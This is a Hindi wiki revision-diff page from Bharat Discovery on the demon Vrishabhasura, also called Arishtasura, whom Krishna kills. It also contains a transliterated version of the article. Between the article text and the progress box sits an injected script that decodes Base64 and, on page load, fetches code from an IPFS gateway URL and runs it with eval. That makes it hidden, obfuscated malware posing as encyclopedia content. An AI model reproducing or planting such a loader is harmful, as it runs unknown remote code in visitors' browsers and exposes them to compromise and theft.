Difference between revisions of "वृषभासुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[कृष्ण]] को मारने के उद्देश्य से यह [[असुर]] एक दिन [[गाय|गायों]] के बीच वृषभ का रूप धारण करके आया था। उसके देखते ही गाएँ भयभीत होकर इधर-उधर भागने लगीं। कृष्ण ने उसे पहिचान लिया। वृषभासुर कृष्ण को भी मारने के लिए दौड़ा। लेकिन कृष्ण ने उसे पैर पकड़कर मार डाला। इसे अरिष्टासुर भी कहा गया है।<ref>राजेन्द्र कुमार वर्मा</ref>
 
[[कृष्ण]] को मारने के उद्देश्य से यह [[असुर]] एक दिन [[गाय|गायों]] के बीच वृषभ का रूप धारण करके आया था। उसके देखते ही गाएँ भयभीत होकर इधर-उधर भागने लगीं। कृष्ण ने उसे पहिचान लिया। वृषभासुर कृष्ण को भी मारने के लिए दौड़ा। लेकिन कृष्ण ने उसे पैर पकड़कर मार डाला। इसे अरिष्टासुर भी कहा गया है।<ref>राजेन्द्र कुमार वर्मा</ref>
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 12:39, 10 January 2011

krishna ko marane ke uddeshy se yah asur ek din gayoan ke bich vrishabh ka roop dharan karake aya tha. usake dekhate hi gaean bhayabhit hokar idhar-udhar bhagane lagian. krishna ne use pahichan liya. vrishabhasur krishna ko bhi marane ke lie dau da. lekin krishna ne use pair pak dakar mar dala. ise arishtasur bhi kaha gaya hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rajendr kumar varma